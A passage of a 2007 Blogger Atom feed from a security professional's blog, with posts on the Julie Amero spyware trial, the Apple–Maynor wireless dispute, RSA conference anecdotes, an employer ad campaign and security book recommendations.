utility.&lt;p&gt;&lt;/p&gt;[and]&lt;br /&gt;&lt;br /&gt;Since this is a key portion of the prosecution's case, Alex Shipp contacted a representative from the makers of ComputerCOP about this aspect of their software. Alex tells me:&lt;br /&gt;&lt;blockquote&gt;Allison Whitney, director of communications for ComputerCOP, confirmed that the product was unable to distinguish between URLs visited as a result of malicious software, and URLs visited by direct user action.&lt;br /&gt;&lt;br /&gt;She also confirmed that this point is not made clear during the ComputerCOP training. 
At this point in time, ComputerCOP have no plans to contact the Connecticut court to point out the errors in interpretation of the ComputerCOP output made by the prosecution attorney and prosecution expert witness.&lt;br /&gt;&lt;/blockquote&gt;[and]&lt;br /&gt;&lt;br /&gt;Why didn't the defense present these kinds of findings? They tried. There appears to have been a procedural error on the defense's part, and the judge would not allow the defense to enter their evidence. The defense expert has publicly stated that his analysis of the computer files would have revealed that spyware was causing the pop-ups to appear and he feels the evidence would have totally exonerated Julie.&lt;br /&gt;&lt;br /&gt;[end of extra material]&lt;br /&gt;&lt;br /&gt;Speaking of procedural errors on the defense attorney's part, it appears that Julie is getting a new &lt;a href="http://www.norwichbulletin.com/apps/pbcs.dll/article?AID=/20070222/NEWS01/702220367"&gt;lawyer&lt;/a&gt;, and this may delay sentencing. This is good news. The article makes the new lawyer out to be a hot shot, which is exactly what Julie needs. Despite the fact that she has been declared guilty already, there are a couple of small chances for the case to be resolved before sentencing still, from what I understand. The prosecution could realize that there has been an error in the facts presented, and request that the verdict be vacated, for example. 
I'm obviously not a lawyer, so apologies if I have abused the terminology.&lt;br /&gt;&lt;br /&gt;Despite the TV shows you see, I'm learning that appeals aren't as easy to get as you would think, so anything that helps slow this train wreck down and bring some sanity into the situation is a welcome development.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-9154095379830287501?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/9154095379830287501/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=9154095379830287501' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/9154095379830287501'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/9154095379830287501'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/02/julie-amero-addl.html' title='Julie Amero add&apos;l'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-6459828545485465730</id><published>2007-02-10T09:53:00.000-08:00</published><updated>2007-02-10T15:14:10.860-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='OS X sucks'/><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>Apple vs. 
Maynor update</title><content type='html'>I had a great time chatting with people at the &lt;a href="http://www.mckeay.net/secure/2007/02/rsa_security_bloggers_meetup_w.html"&gt;security bloggers&lt;/a&gt; meetup the other night. There were any number of "I didn't know you blogged" moments all around. Two of the guys I spent some time talking with were David Maynor and Robert Graham who have recently formed &lt;a href="http://www.erratasec.com/"&gt;Errata Security&lt;/a&gt;. And yes! they are &lt;a href="http://erratasec.blogspot.com/"&gt;blogging&lt;/a&gt; too.&lt;br /&gt;&lt;br /&gt;We chatted about all kinds of things. We chatted about Robert moving on after IBM acquired ISS. It seems that David found some reason to move on from his position at Secureworks, too. And then we went to dinner at some Mediterranean tapas food place, and chatted some more. They bought. Thanks for the dinner, guys!&lt;br /&gt;&lt;br /&gt;So when I got back home, I tracked down their blog, and there's some good stuff there. Hey look, there's this one &lt;a href="http://erratasec.blogspot.com/2007/02/more-on-apple-wifi-blunder-or-i-am-no.html"&gt;particular&lt;/a&gt; entry from David. Looks like he's tired of keeping his mouth shut about the &lt;a href="http://ryanlrussell.blogspot.com/2006/09/when-where-how-and-for-how-much-to.html"&gt;Mac wireless hack&lt;/a&gt; thing. Short version of my take on the issue: I believe David and Johnny.&lt;br /&gt;&lt;br /&gt;But at this point, I do have to agree that some opportunities have been lost. The Matasano guys propose some &lt;a href="http://www.matasano.com/log/466/notarized-advisories-prove-you-found-something-without-giving-up-secrets/"&gt;hoops&lt;/a&gt; that researchers should be going through. Frankly, I thought that was a little silly and totally unnecessary. Even in David's case. I never thought for a second that Apple would ship the patch while still claiming that David and Johnny found nothing. 
I was wrong on both counts.&lt;br /&gt;&lt;br /&gt;So unfortunately, this leaves room for the next bit of stupidity. If/when David ever decides to demo owning the built-in wireless, or release an exploit, etc... then the Mac zealots will claim that he must have reverse-engineered the Apple patch, and that he never found anything ahead of time.&lt;br /&gt;&lt;br /&gt;Because David can reverse engineer the patch and write a working exploit, but he's not capable of finding the hole in the first place, right? And the hole that Apple fixed just coincidentally is in the area that the original Black Hat talk covered. And the holes in other OSes that they found of the same class aren't related. &lt;strike&gt;And HD Moore using their fuzzer and finding a similar hole in OS X has nothing to do with it.&lt;/strike&gt;&lt;br /&gt;&lt;br /&gt;One of these days, I hope David drops more info. At this point though, it looks like Apple has been largely successful. They have managed to drag things out long enough and tell enough half-truths that their customers believe Apple. So it's likely that few zealots will be swayed when David finally presents proof. There will just be further dismissals from people who really don't understand security very well. 
I still look forward to it, though.&lt;br /&gt;&lt;br /&gt;Hey look, David is speaking a couple of times at &lt;a href="http://blackhat.com/html/bh-dc-07/bh-dc-07-speakers.html"&gt;Black Hat Federal&lt;/a&gt; later this month.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-6459828545485465730?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/6459828545485465730/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=6459828545485465730' title='10 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/6459828545485465730'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/6459828545485465730'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/02/apple-vs-maynor-update.html' title='Apple vs. 
Maynor update'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>10</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-571835098882784615</id><published>2007-02-10T01:20:00.000-08:00</published><updated>2007-02-10T22:43:13.105-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='work'/><category scheme='http://www.blogger.com/atom/ns#' term='stories'/><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>I'm in ur package, playing with ur puzzlez</title><content type='html'>So one of the developers I work with, Dave, is quite the twisty-puzzle fanatic. Take a look at some of his &lt;a href="http://flickr.com/photos/55244424@N00/"&gt;photos&lt;/a&gt; on flickr, and you'll see what I mean. Here's something like 1/3 to 1/2 of what he has in his office at work:&lt;br /&gt;&lt;a href="http://flickr.com/photos/55244424@N00/362973744/"&gt;&lt;br /&gt;&lt;img src="http://farm1.static.flickr.com/92/362973744_571bb8c639_m.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://flickr.com/photos/55244424@N00/362973749/"&gt;&lt;br /&gt;&lt;img src="http://farm1.static.flickr.com/115/362973749_5e8bdb043a_m.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;As you might imagine, Dave is also on all the various puzzle sites, and knows which puzzles are rare, which are worth the most, and which ones he doesn't have. Recently, he worked out a trade with some other puzzle collector in another country. He shipped a &lt;a href="http://www.twistypuzzles.com/cgi-bin/puzzle.cgi?pid=618"&gt;Square-1&lt;/a&gt; in exchange for a few other puzzles. 
This is what arrived in the mail:&lt;br /&gt;&lt;a href="http://flickr.com/photos/55244424@N00/382544360/"&gt;&lt;br /&gt;&lt;img src="http://farm1.static.flickr.com/177/382544360_233f2ddea3_m.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Yes, go ahead and look at the larger version of that pic. That's the &lt;a href="http://www.dhs.gov/"&gt;Department of Homeland Security&lt;/a&gt; logo. So what was inside that caused such alarm that they had to open his package in transit to inspect it?&lt;br /&gt;&lt;a href="http://flickr.com/photos/55244424@N00/382544396/"&gt;&lt;br /&gt;&lt;img src="http://farm1.static.flickr.com/98/382544396_9da81da53a_m.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;We suspect it was the rare and unusual &lt;a href="http://www.twistypuzzles.com/cgi-bin/puzzle.cgi?pid=466"&gt;Rubik's Hat&lt;/a&gt; that caught their attention. Had it been your run-of-the-mill 3x3, I doubt they would have felt it necessary to play with it. Or maybe they saw The Da Vinci Code recently, and it looked like a cryptex on the x-ray?&lt;br /&gt;&lt;br /&gt;Rubik-sniffing dogs?&lt;br /&gt;&lt;br /&gt;Dave did note that whoever was fondling his hat didn't seem to have any luck solving it. Good thing he didn't trade for something with batteries and wires.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Update:&lt;/span&gt; As if to further prove his cube-geekiness (did I mention that he placed fairly well at the recent cube-solving time trials?) Dave writes:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;Nice, although technically it was my custom modified Square-1 that I traded, as a vanilla Square-1 is only worth $20-$30. I hear that the maker may even be doing another round of production, in which case the price might go back down to $9.99 or so. 
Here's a flickr picture of my custom modification:&lt;br /&gt;&lt;br /&gt;&lt;a class="moz-txt-link-freetext" href="http://farm1.static.flickr.com/135/362992417_66e4734f8a.jpg"&gt;http://farm1.static.flickr.com/135/362992417_66e4734f8a.jpg&lt;/a&gt;&lt;/blockquote&gt;&lt;a class="moz-txt-link-freetext" href="http://farm1.static.flickr.com/135/362992417_66e4734f8a.jpg"&gt;&lt;/a&gt;&lt;pre wrap=""&gt;I stand corrected.&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-571835098882784615?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/571835098882784615/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=571835098882784615' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/571835098882784615'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/571835098882784615'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/02/im-in-ur-package-playing-with-ur.html' title='I&apos;m in ur package, playing with ur puzzlez'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://farm1.static.flickr.com/92/362973744_571bb8c639_t.jpg' height='72' 
width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-8888354081629996395</id><published>2007-02-08T01:11:00.000-08:00</published><updated>2007-02-08T00:56:01.762-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='egoblogging'/><title type='text'>Kidnapped</title><content type='html'>Alright, I admit this has nothing to do with my usual blogging topics. Maybe because I snapped it while leaving the hall at RSA to head to the security bloggers party?&lt;br /&gt;&lt;br /&gt;&lt;div style="width: 240px; text-align: right;"&gt;&lt;a href="http://beta.zooomr.com/photos/ryanlrussell/718388/" title="Zooomr Photo Sharing :: Photo Sharing"&gt;&lt;img src="http://static.zooomr.com/images/718388_77089aaf98_m.jpg" alt="DSC01378" style="border: 1px solid rgb(0, 0, 0);" border="0" height="180" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hey, at least that's not quite as bad as ninjas killing your family.&lt;br /&gt;&lt;br /&gt;I paid the gentleman a dollar for the privilege of taking his photo. I found him on 4th street between Howard and Mission, around 6pm. 
I have no idea what his usual working hours are, or how often he rotates his signs.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-8888354081629996395?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/8888354081629996395/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=8888354081629996395' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/8888354081629996395'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/8888354081629996395'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/02/kidnapped.html' title='Kidnapped'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-5983782841041144564</id><published>2007-02-08T00:44:00.000-08:00</published><updated>2007-02-08T00:40:12.957-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>Second best ad at RSA</title><content type='html'>I hereby declare the second-best ad at RSA:&lt;br /&gt;&lt;br /&gt;&lt;div style="width: 240px; text-align: right;"&gt;&lt;a href="http://beta.zooomr.com/photos/ryanlrussell/718329/" title="Zooomr Photo Sharing :: Photo Sharing"&gt;&lt;img src="http://static.zooomr.com/images/718329_847ec746e3_m.jpg" alt="DSC01377" style="border: 1px solid rgb(0, 0, 0);" border="0" 
height="180" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;"Beware of False Positives"&lt;br /&gt;&lt;br /&gt;Awesome!&lt;br /&gt;&lt;br /&gt;(I give "&lt;a href="http://ryanlrussell.blogspot.com/2007/02/im-shillin-like-villain.html"&gt;best&lt;/a&gt;" to my company's own ad, of course. It holds a special place in my heart. However, if you think this one is first place, and ours only second, I'll forgive you.)&lt;br /&gt;&lt;br /&gt;The woman working the booth tells me that it was "obtained" in Seattle, and is authentic. They were raffling it off in their booth. Excellent job &lt;a href="http://cyberdefender.com/"&gt;CyberDefender&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-5983782841041144564?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/5983782841041144564/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=5983782841041144564' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5983782841041144564'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5983782841041144564'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/02/second-best-ad-at-rsa.html' title='Second best ad at RSA'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-4363970270634314022</id><published>2007-02-07T23:46:00.000-08:00</published><updated>2007-02-06T14:02:26.950-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='work'/><category scheme='http://www.blogger.com/atom/ns#' term='egoblogging'/><title type='text'>I'm shillin' like a villain</title><content type='html'>I just had a great time at the &lt;a href="http://www.mckeay.net/secure/2007/02/rsa_security_bloggers_meetup_w.html"&gt;security bloggers&lt;/a&gt; thing.  I was a little surprised that not only a number of them read my blog, but given that, they don't realize I work for &lt;a href="http://www.bigfix.com/"&gt;BigFix&lt;/a&gt;. Speaking of vendor &lt;a href="http://techbuddha.wordpress.com/2007/02/01/biased/"&gt;bias&lt;/a&gt;, I will now attempt to provide a good clear example.&lt;br /&gt;&lt;br /&gt;We have been trying some new ad campaigns lately. First, there are the &lt;a href="http://www.bigfix.com/softwaretruth/"&gt;Software Truth&lt;/a&gt; viral videos. I think they're worth a chuckle. We've gotten some good feedback, and people seem to like them. So far, the only complaint has been from one blogger who seems to have been fooled into thinking they were some sort of real senate hearing. But I think that reflects more on that particular blogger than it does on our videos.&lt;br /&gt;&lt;br /&gt;And then the last couple weeks at work, I see this ad taped to the door of our CEO's office. I assumed it was an internal joke thing, and that we would not go there.&lt;br /&gt;&lt;br /&gt;Apparently, we would. We are on the playground talking smack, and our competitors should consider it to have officially been brought.&lt;br /&gt;&lt;br /&gt;Check out this &lt;a href="http://www.bigfix.com/bfg/bfg.pdf"&gt;ad&lt;/a&gt; (~1MB .pdf). 
I'm told that this ran nice and large in the Northern California edition of the Wall Street Journal today. And you should expect to see it in a number of magazines Real Soon Now. Should you enjoy it as much as I do, you can go to our &lt;a href="http://www.bigfix.com/bfg/"&gt;site&lt;/a&gt; and sign up for a demo of our stuff, and get a poster version of it. (If you don't want to grab the PDF, that link also shows the picture and text, so you'll get the idea.)&lt;br /&gt;&lt;br /&gt;Yes, those are McAfee, Symantec, altiris, and Landesk we are ramming our sword through.&lt;br /&gt;&lt;br /&gt;Generally speaking, I'm not big on cheerleading for my employer. I try to be careful about plugging my company's stuff out of context. If I'm writing a book or an article, a mention in my bio is usually sufficient. If I'm speaking, the line on the first page of the slide deck is usually good enough, even though they probably paid for my travel. And when I'm overtly pointing out something we're doing, I try to make it abundantly clear that I'm an employee, and that I'm in sell mode.&lt;br /&gt;&lt;br /&gt;But when my employer does something above and beyond, and I really approve of it, I'm willing to occasionally give props like this. I think an ad campaign like this takes balls of a certain minimum diameter, and I'm glad to see we've got 'em.&lt;br /&gt;&lt;br /&gt;The cynics (and maybe competitors) among you might look at an ad like this, think to yourself that you haven't heard much about BigFix before, and conclude that this is a desperate cry for attention from a struggling company. And frankly, if I weren't on the inside seeing what we are doing, I might agree with you, and cringe when I saw us doing this.&lt;br /&gt;&lt;br /&gt;But the fact is, we are growing big time. We are replacing our competition all the time, and beat them regularly in customer evaluations. 
Despite the fact that these guys pay me, and I'm talking about the software that I QA every day, I'm still sincerely impressed with it. It actually works.&lt;br /&gt;&lt;br /&gt;We do not come in peace.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-4363970270634314022?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/4363970270634314022/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=4363970270634314022' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/4363970270634314022'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/4363970270634314022'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/02/im-shillin-like-villain.html' title='I&apos;m shillin&apos; like a villain'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-8943081966682321937</id><published>2007-02-03T23:39:00.000-08:00</published><updated>2007-02-03T23:53:47.522-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='books'/><title type='text'>Old skool security</title><content type='html'>While researching things for the &lt;a href="http://osvdb.org/blog/?p=77"&gt;Oldest Vulnerability Contest&lt;/a&gt;, I ran across a number of references to "Computer abuse perpetrators and vulnerabilities of computer 
systems" 1975, by Donn B. Parker. I did find it listed on Amazon, unknown binding, ASIN B0006WFZ9I. I left it on pre-order for a good year or so, but no one was ever selling one.&lt;br /&gt;&lt;br /&gt;Mr. Parker appears to have written a number of security books and reports in the 70's and 80's, mostly while working at SRI. You can find most of his published books easily enough, but not what I'm looking for. I'm guessing it's not a regular book.&lt;br /&gt;&lt;br /&gt;I can see that he left a &lt;a href="http://www.cbi.umn.edu/collections/inv/cbi00166.html"&gt;collection&lt;/a&gt; to The Charles Babbage Institute at UMN that includes it. I'm going to check there about getting a copy. He seems to have granted some copyrights to CBI, so that might work out.&lt;br /&gt;&lt;br /&gt;Also, anyone know if Donn Parker is still alive, and if so, how to reach him? I'd love to do an interview with him. 
I see references to him doing things in the early 2000's, so he can't have been gone long, if he is.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-8943081966682321937?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/8943081966682321937/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=8943081966682321937' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/8943081966682321937'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/8943081966682321937'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/02/old-skool-security.html' title='Old skool security'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-273070191792371773</id><published>2007-02-03T13:11:00.000-08:00</published><updated>2007-02-03T13:27:54.657-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='stories'/><category scheme='http://www.blogger.com/atom/ns#' term='books'/><title type='text'>Amazon Links</title><content type='html'>I'm trying to see what Amazon links look like now. I've had an Amazon affiliate account for years, but I have barely ever used it. I used to just throw my associate ID ("thievco") onto links, but it looks like that changed probably around 2004. 
Amazon sent me a quarterly report email the other day, so I thought I would look into it. I plan to mention books frequently, and I'm not at all above throwing on my associate ID. But I wanted to see how it was going to look.&lt;br /&gt;&lt;br /&gt;Here's one for my latest book, which is now in print and in stock:&lt;br /&gt;&lt;br /&gt;&lt;iframe src="http://rcm.amazon.com/e/cm?t=thievco&amp;o=1&amp;amp;p=8&amp;l=as1&amp;amp;asins=1597490814&amp;fc1=000000&amp;amp;IS2=1&amp;lt1=_blank&amp;amp;amp;amp;lc1=0000FF&amp;bc1=000000&amp;amp;bg1=FFFFFF&amp;f=ifr" style="width: 120px; height: 240px;" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;br /&gt;Let's see how that looks. I may twiddle this post, apologies if it shows up in a feed multiple times. Of course, this is all javascripty, so if you're reading this in an RSS reader, you probably don't see it at all. Don't worry, I'll do a proper post in the near future where I shill my latest book the right way.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Update&lt;/span&gt;: Whoops! I was wrong. I found the right report, and I did get some hits from the old-style affiliate links. I put a link somewhere, and two people bought a book based on that. I have earned 83 cents this year so far. Thank you for the support. 
;)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-273070191792371773?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/273070191792371773/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=273070191792371773' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/273070191792371773'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/273070191792371773'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/02/amazon-links.html' title='Amazon Links'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-3657562175420304680</id><published>2007-02-03T13:00:00.000-08:00</published><updated>2007-02-22T23:06:14.932-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='books'/><title type='text'>"Art of Software Security Assessment, The"</title><content type='html'>Just got a new post in my RSS feed from the authors' blog for "The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities". Justin Schuh &lt;a href="http://taossa.com/index.php/2007/02/03/book-sale/"&gt;says&lt;/a&gt; that InformIT has their book on &lt;a href="http://www.informit.com/promotions/promotion.asp?promo=4030&amp;rl=1"&gt;sale&lt;/a&gt; at a significant savings. 
I did some cursory checking, and InformIT does seem to have the best price. Ground shipping was free, so my total (after adding tax) was $35.88. Not bad. Amazon wants list price for it, so don't buy it there.&lt;br /&gt;&lt;br /&gt;&lt;iframe src="http://rcm.amazon.com/e/cm?t=thievco&amp;o=1&amp;p=8&amp;l=as1&amp;asins=0321444426&amp;fc1=000000&amp;IS2=1&amp;lt1=_blank&amp;lc1=0000FF&amp;bc1=000000&amp;bg1=FFFFFF&amp;f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;br /&gt;I've been meaning to buy this book since it came out. This offer seemed like a good reason to get around to doing that. Obviously, since I'm just now buying it, I can't offer a review. However, a number of people whose opinions on this topic I respect, like &lt;a href="http://seclists.org/dailydave/2006/q4/0285.html"&gt;Dave Aitel&lt;/a&gt;, and the &lt;a href="http://www.matasano.com/log/"&gt;Matasano&lt;/a&gt; guys, indicate that it is well worth reading.&lt;br /&gt;&lt;br /&gt;I'll try and get a proper review in, but my reading backlog is already comically long. But mostly I wanted to point out that this looks like a cool book, and if you're going to buy it, do so at this price.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Update:&lt;/span&gt; Uh oh, I got an email that it is backordered. "We strive to fill backorders within 30 days.  If we are unable to ship your backordered item(s) within that time frame, we will cancel the item(s) on backorder and you will receive an e-mail confirmation of the cancellation." Good thing I'm not in a hurry. I hope I didn't talk anyone into wasting their time waiting if it's not going to come.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Update 2:&lt;/span&gt; It arrived on Feb. 19. The guys &lt;a href="http://taossa.com/index.php/2007/02/13/who-needs-isbns-anyway/"&gt;posted&lt;/a&gt; a blog entry about the delays. 
I suspect they have the stock straightened out now.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-3657562175420304680?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/3657562175420304680/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=3657562175420304680' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/3657562175420304680'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/3657562175420304680'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/02/art-of-software-security-assessment.html' title='&quot;Art of Software Security Assessment, The&quot;'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 